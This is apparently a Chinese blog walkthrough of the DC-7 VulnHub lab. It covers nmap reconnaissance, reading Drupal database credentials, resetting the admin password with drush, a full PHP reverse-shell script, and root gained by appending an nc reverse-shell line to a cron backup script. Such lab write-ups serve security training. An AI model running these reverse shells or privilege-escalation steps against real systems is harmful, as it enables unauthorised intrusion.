Lluna's Pure land.

What is life like when singing to wine?

0%

DC-7

0x00.官网描述

DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

While this isn’t an overly technical challenge, it isn’t exactly easy.

While it’s kind of a logical progression from an earlier DC release (I won’t tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won’t succeed.

What you will need to do, is to think “outside” of the box.

Waaaaaay “outside” of the box. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

0x01.老规矩nmap

可以发现1为网关,2为宿主机,6为kali,那么8就是我们的受害者

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@JIYE:~/vulnhub/dc7# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 05:50 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0034s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00029s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.8
Host is up (0.061s latency).
MAC Address: AC:BD:70:18:C0:9F (Unknown)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds
root@JIYE:~/vulnhub/dc7#

0x02.继续nmap扫描服务及端口

可以发现开放了22/80端口,且Drupal的版本为8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
root@JIYE:~/vulnhub/dc6# nmap -sC -sV -v 192.168.1.8 -oN nmap.demo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 05:57 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:57
Completed NSE at 05:57, 0.00s elapsed
Initiating NSE at 05:57
Completed NSE at 05:57, 0.00s elapsed
Initiating NSE at 05:57
Completed NSE at 05:57, 0.00s elapsed
Initiating ARP Ping Scan at 05:57
Scanning 192.168.1.8 [1 port]
Completed ARP Ping Scan at 05:57, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:57
Completed Parallel DNS resolution of 1 host. at 05:57, 0.03s elapsed
Initiating SYN Stealth Scan at 05:57
Scanning 192.168.1.8 [1000 ports]
Discovered open port 22/tcp on 192.168.1.8
Discovered open port 80/tcp on 192.168.1.8
Completed SYN Stealth Scan at 05:57, 0.06s elapsed (1000 total ports)
Initiating Service scan at 05:57
Scanning 2 services on 192.168.1.8
Completed Service scan at 05:57, 7.05s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.8.
Initiating NSE at 05:57
Completed NSE at 05:57, 1.62s elapsed
Initiating NSE at 05:57
Completed NSE at 05:57, 0.01s elapsed
Initiating NSE at 05:57
Completed NSE at 05:57, 0.00s elapsed
Nmap scan report for 192.168.1.8
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
| 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 00:0C:29:B7:50:22 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 05:57
Completed NSE at 05:57, 0.00s elapsed
Initiating NSE at 05:57
Completed NSE at 05:57, 0.00s elapsed
Initiating NSE at 05:57
Completed NSE at 05:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.036KB)
root@JIYE:~/vulnhub/dc7#

0x03.发现80端口,直接访问

发现一些信息,我需要在盒子外面思考,而不是去暴力破解

找了一圈也没发现啥,但在底部发现了一个用户线索,进行谷歌搜索。

点击第一个

只有一个项目,点进去看看

查看readme.txt,确实跟DC-7有关

查看配置文件

发现用户名与密码

0x04.登入

1.尝试登入web application,霸特失败了

2.开放了22端口,尝试ssh登入,结果是可以的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@JIYE:~/vulnhub/dc7# ssh dc7user@192.168.1.8
The authenticity of host '192.168.1.8 (192.168.1.8)' can't be established.
ECDSA key fingerprint is SHA256:J5aG8w2iY0G0Nh3p4L+WzXXaQ7O1GjFTlfAYwkBIbM4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.8' (ECDSA) to the list of known hosts.
dc7user@192.168.1.8's password:
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$ whoami
dc7user
dc7user@dc-7:~$

0x05.查看端口使用情况,并发现一封邮件

发现开启了3306

1
2
3
4
5
6
7
8
9
10
11
12
13
dc7user@dc-7:~$ netstat -pantu
-bash: netstat: command not found
You have new mail in /var/mail/dc7user
dc7user@dc-7:~$ ss -pantu
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 20 127.0.0.1:25 *:*
tcp ESTAB 0 0 192.168.1.8:22 192.168.1.6:47064
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 20 ::1:25 :::*

查看数据库用户与密码

1
2
3
4
5
6
7
8
9
10
11
12
13
dc7user@dc-7:/var/www/html/sites/default$ cat settings.php
...
...
$databases['default']['default'] = array (
'database' => 'd7db',
'username' => 'db7user',
'password' => 'yNv3Po00',
'prefix' => '',
'host' => 'localhost',
'port' => '',
'namespace' => 'Drupal\\Core\\Database\\Driver\\mysql',
'driver' => 'mysql',
);

登入数据库,发现admin存在

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
dc7user@dc-7:/var/www/html/sites/default$ mysql -udb7user -pyNv3Po00
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 53
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| d7db |
| information_schema |
+--------------------+
2 rows in set (0.00 sec)

MariaDB [(none)]> use d7db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [d7db]> show tables;
+----------------------------------+
| Tables_in_d7db |
+----------------------------------+
| block_content |
| block_content__body |
| block_content_field_data |
| block_content_field_revision |
| block_content_revision |
| block_content_revision__body |
| cache_bootstrap |
| cache_config |
| cache_container |
| cache_data |
| cache_default |
| cache_discovery |
| cache_dynamic_page_cache |
| cache_entity |
| cache_menu |
| cache_page |
| cache_render |
| cache_toolbar |
| cachetags |
| config |
| file_managed |
| file_usage |
| flood |
| history |
| key_value |
| key_value_expire |
| menu_link_content |
| menu_link_content_data |
| menu_link_content_field_revision |
| menu_link_content_revision |
| menu_tree |
| node |
| node__body |
| node__field_image |
| node__field_tags |
| node_access |
| node_field_data |
| node_field_revision |
| node_revision |
| node_revision__body |
| node_revision__field_image |
| node_revision__field_tags |
| queue |
| router |
| search_dataset |
| search_index |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut |
| shortcut_field_data |
| shortcut_set_users |
| taxonomy_index |
| taxonomy_term__parent |
| taxonomy_term_data |
| taxonomy_term_field_data |
| taxonomy_term_field_revision |
| taxonomy_term_revision |
| taxonomy_term_revision__parent |
| url_alias |
| user__roles |
| user__user_picture |
| users |
| users_data |
| users_field_data |
| watchdog |
+----------------------------------+
67 rows in set (0.00 sec)

MariaDB [d7db]> select * from users\G;
*************************** 1. row ***************************
uid: 0
uuid: e813638d-3eb3-4212-af40-171dd51023e9
langcode: en
*************************** 2. row ***************************
uid: 1
uuid: fd93872d-a854-44cd-bb08-eb9a11e46492
langcode: en
*************************** 3. row ***************************
uid: 2
uuid: 68803de9-fc7b-4b7b-bce8-d04f11ac4c8a
langcode: en
3 rows in set (0.00 sec)

ERROR: No query specified

MariaDB [d7db]> select * from users_field_data\G;
*************************** 1. row ***************************
uid: 0
langcode: en
preferred_langcode: en
preferred_admin_langcode: NULL
name:
pass: NULL
mail: NULL
timezone:
status: 0
created: 1567054076
changed: 1567054076
access: 0
login: 0
init: NULL
default_langcode: 1
*************************** 2. row ***************************
uid: 1
langcode: en
preferred_langcode: en
preferred_admin_langcode: NULL
name: admin
pass: $S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F
mail: admin@example.com
timezone: Australia/Melbourne
status: 1
created: 1567054076
changed: 1567054076
access: 1567098850
login: 1567098643
init: admin@example.com
default_langcode: 1
*************************** 3. row ***************************
uid: 2
langcode: en
preferred_langcode: en
preferred_admin_langcode: en
name: dc7user
pass: $S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI
mail: dc7user@blah.com
timezone: Australia/Brisbane
status: 1
created: 1567057938
changed: 1567057938
access: 0
login: 0
init: dc7user@blah.com
default_langcode: 1
3 rows in set (0.00 sec)

ERROR: No query specified

MariaDB [d7db]>

0x06查看邮件

发现一个备份脚本/opt/scripts/backups.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
dc7user@dc-7:~$ cd /var/mail
dc7user@dc-7:/var/mail$ ls
dc7user
dc7user@dc-7:/var/mail$ cat dc7user
From root@dc-7 Fri Aug 28 20:00:13 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 28 Aug 2020 20:00:13 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1kBbB7-0000HQ-RB
for root@dc-7; Fri, 28 Aug 2020 20:00:13 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1kBbB7-0000HQ-RB@dc-7>
Date: Fri, 28 Aug 2020 20:00:13 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]

From root@dc-7 Fri Aug 28 20:15:05 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 28 Aug 2020 20:15:05 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1kBbPV-0000I3-Sk
for root@dc-7; Fri, 28 Aug 2020 20:15:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1kBbPV-0000I3-Sk@dc-7>
Date: Fri, 28 Aug 2020 20:15:05 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]

From root@dc-7 Fri Aug 28 20:30:06 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 28 Aug 2020 20:30:06 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1kBbe2-0000K5-2D
for root@dc-7; Fri, 28 Aug 2020 20:30:06 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1kBbe2-0000K5-2D@dc-7>
Date: Fri, 28 Aug 2020 20:30:06 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]

dc7user@dc-7:/var/mail$

查看/opt/scripts/backups.sh,属组为www-data

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
dc7user@dc-7:~$ ls -l /opt/scripts/backups.sh 
-rwxrwxr-x 1 root www-data 520 Aug 29 2019 /opt/scripts/backups.sh
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
dc7user@dc-7:~$

查看drush参数,发现它可以修改drupal用户密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
dc7user@dc-7:~$ drush | grep user
sanitize:user-fields Sanitize string fields associated with the user.
(sanitize-user-field
User commands: (user)
user-add-role (urol, Add a role to the specified user accounts.
user:add:role)
user-block (ublk, Block the specified user(s).
user:block)
user-cancel (ucan, Cancel a user account with the specified name.
user:cancel)
user-create (ucrt, Create a user account with the specified name.
user:create)
user-information Print information about the specified user(s).
user:information)
user-login (uli, Display a one time login link for the given user account (defaults to uid 1).
user:login)
user-password (upwd, (Re)Set the password for the user account with the specified name.
user:password)
user-remove-role Remove a role from the specified user accounts.
user:remove:role)
user-unblock (uublk, Unblock the specified user(s).
user:unblock)
dc7user@dc-7:~$

修改admin密码

1
2
3
4
dc7user@dc-7:~$ cd /var/www/html/
dc7user@dc-7:/var/www/html$ drush user-password admin --password="admin"
Changed password for admin [success]
dc7user@dc-7:/var/www/html$

0x07.登入

发现可以安装扩展插件

安装php扩展插件安装地址

出现下图即为成功

这里一定要勾选

安装

下图即为成功

0x07.反弹shell

1.编写reverse-shell

本次使用/usr/share/webshells/php/php-reverse-shell.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.6'; // CHANGE THIS
$port = 9001; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}

// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}

?>

2.kali监听

1
2
3
root@JIYE:~/vulnhub/dc7# nc -nvlp 6666
listening on [any] 6666 ...

3.保存浏览

4.kali get shell

1
2
3
4
5
6
7
8
9
root@JIYE:~# nc -nvlp 9001
listening on [any] 9001 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.8] 39786
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
23:43:02 up 3:49, 0 users, load average: 0.01, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

5.升级shell

1
2
3
4
5
6
7
8
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-7:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@dc-7:/$ whoami
whoami
www-data
www-data@dc-7:/$

5.升级交互shell

1
2
3
4
5
6
7
8
www-data@dc-7:/$ ^Z
[1]+ 已停止 nc -nvlp 9001
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 9001

www-data@dc-7:/$ whoami
www-data
www-data@dc-7:/$

0x08.提权

backups具有执行权限,所以利用他提权

1
2
3
4
5
6
7
www-data@dc-7:/var/mail$ cd /opt/scripts/
www-data@dc-7:/opt/scripts$ ls
backups.sh
www-data@dc-7:/opt/scripts$
www-data@dc-7:/opt/scripts$ ls -l backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29 2019 backups.sh
www-data@dc-7:/opt/scripts$

编辑文件参考

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.6 9002 >/tmp/f

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@dc-7:/opt/scripts$echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.6 9002 >/tmp/f" >> backups.sh
www-data@dc-7:/opt/scripts$ cat backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.6 9002 >/tmp/f
www-data@dc-7:/opt/scripts$

kali监听

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root@JIYE:~# nc -nvlp 9002
listening on [any] 9002 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.8] 45590
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-7:/var/www# cd
cd
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt




888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@dc-7:~#
-------------纸短情长下次再见-------------